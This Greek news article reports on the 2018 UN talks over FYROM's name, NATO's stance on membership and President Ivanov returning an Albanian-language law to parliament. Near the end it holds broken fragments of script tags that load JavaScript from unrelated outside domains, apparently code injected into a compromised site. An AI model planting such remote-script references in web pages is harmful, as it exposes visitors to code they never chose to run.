Νίμιτς: ‘Ολες οι προτάσεις μου περιέχουν τον όρο «Μακεδονία»

Ολοκληρώθηκε η συνάντηση στα Ηνωμένα Έθνη για την ονομασία της ΠΓΔΜ, με την συμμετοχή των διαπραγματευτών της Αθήνας και των Σκοπίων, πρέσβεων Αδαμάντιου Βασιλάκη και Βάσκο Ναουμόφσκι, υπό τον ειδικό διαμεσολαβητή του ΟΗΕ, Μάθιου Νίμιτς.

Σε δηλώσεις του ο Μάθιου Νίμιτς είπε ότι κατέθεσε μια σειρά προτάσεων προς τις δύο πλευρές προκειμένου να τις επεξεργαστούν, οι οποίες περιλαμβάνουν τον όρο Μακεδονία», σημειώνοντας ότι δεν γίνεται να μην εμπεριέχεται αυτός ο όρος στο όνομα.

Νίμιτς: 'Ολες οι προτάσεις μου περιέχουν τον όρο «Μακεδονία»

Ερωτηθείς για το χρονοδιάγραμμα των διαπραγματεύσεων, ο Νίμιτς το προσδιόρισε σε έναν με δύο μήνες.

«Είμαι πολύ αισιόδοξος για το γεγονός ότι η διαδικασία πηγαίνει προς μια θετική κατεύθυνση» υπογράμμισε ο ειδικός διαμεσολαβητής του ΟΗΕ.

NATO: Πρώτα όνομα, μετά ένταξη

To ΝΑΤΟ θα προσκαλέσει την ΠΓΔΜ να ενταχθεί στους κόλπους του, εφόσον επιτευχθεί αμοιβαίως αποδεκτή λύση στο θέμα του ονόματος, διεμήνυσε ο γγ του ΝΑΤΟ Γενς Στόλτενμπεργκ, σε συνέντευξή του, λίγο πριν την άφιξη του στα Σκόπια

Ερωτηθείς εάν η ΠΓΔΜ μπορεί να λάβει πρόσκληση για ένταξη στο ΝΑΤΟ, στη Σύνοδο Κορυφής της Συμμαχίας που θα διεξαχθεί τον Ιούλιο στις Βρυξέλλες, χωρίς την επίλυση του ζητήματος της ονομασίας, ο κ. Στόλτενμπεργκ απέκλεισε κατηγορηματικά ένα τέτοιο ενδεχόμενο.

«Όχι. Η θέση του ΝΑΤΟ παραμένει αμετάβλητη. Όλες οι αποφάσεις στο ΝΑΤΟ λαμβάνονται στη βάση της συναίνεσης μεταξύ των κρατών-μελών του. Η Σύνοδος Κορυφής του Βουκουρεστίου και όλες οι μετέπειτα Σύνοδοι Κορυφής διατύπωσαν τη θέση ότι το ΝΑΤΟ θα προσκαλέσει τη χώρα σας να ενταχθεί στη Συμμαχία τη στιγμή που θα επιτευχθεί αμοιβαίως αποδεκτή λύση στο ζήτημα της ονομασίας στο πλαίσιο του ΟΗΕ» σημείωσε ο γγ του ΝΑΤΟ.

Πολιτική κρίση εντός ΠΓΔΜ

Κι ενώ εντείνονται οι προσπάθειες για λύση στο θέμα της ονομασίας, υπάρχει πολιτική ένταση εντός της ΠΓΔΜ, έπειτα από την απόφαση του προέδρου Γκιόργκι Ιβάνοφ να μην υπογράψει το διάταγμα για το νόμο που προβλέπει τη διεύρυνση της αλβανικής γλώσσας στη χώρα.

Ο Γκιόργκι Ιβάνοφ ανέφερε ότι ο νόμος αυτός «είναι αντισυνταγματικός και επικίνδυνος για την ακεραιότητα της χώρας» και για τον λόγο αυτό, όπως είπε, τον ανέπεμψε ήδη στη Βουλή. Εάν η Βουλή της ΠΓΔΜ ψηφίσει και πάλι το νόμο, τότε ο πρόεδρος υποχρεούται να υπογράψει το διάταγμα.

Σε κάθε περίπτωση, είναι η πρώτη φορά που ο Γκιόργκι Ιβάνοφ, από το 2009 που ασκεί τα καθήκοντα του προέδρου της χώρας, αναπέμπει νόμο στη Βουλή. Σημειώνεται ότι ο νόμος αυτός προβλέπει την επέκταση της χρήσης της αλβανικής, ως γλώσσας που ομιλείται από άνω του 20% του πληθυσμού σε επίπεδο επικρατείας και τοπικής αυτοδιοίκησης στην ΠΓΔΜ.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>

Leave a Reply

Your email address will not be published. Required fields are marked *

*